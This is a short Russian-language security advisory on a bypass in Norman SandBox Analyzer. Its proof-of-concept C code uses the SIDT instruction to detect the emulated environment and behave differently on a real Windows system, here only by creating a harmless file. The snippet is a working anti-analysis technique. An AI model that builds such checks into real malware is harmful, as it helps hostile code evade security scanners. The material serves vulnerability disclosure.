Программа: Norman SandBox Analyzer
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. Уязвимость существует из-за ошибки в обработке злонамеренного ПО при помещении его в эмулируемую среду. Атакующий может передать в анализатор специально составленные программы, которые будут скрывать свои вредоносные функции при помещении их в эмулируемую среду и сканировании анализатором.
Пример:
Обход SandBox Analyzer и создание файла c:\breakstuff.txt на реальной Windows системе.
unsigned char idt[6];
__asm
{
sidt idt
}
if ((0x00 == idt[0]) && (0x08 == idt[1]))
{
fp = fopen("c:\\donothing.txt", "w");
fclose(fp);
}
else
{
fp = fopen("c:\\breakstuff.txt", "w");
fclose(fp);
}
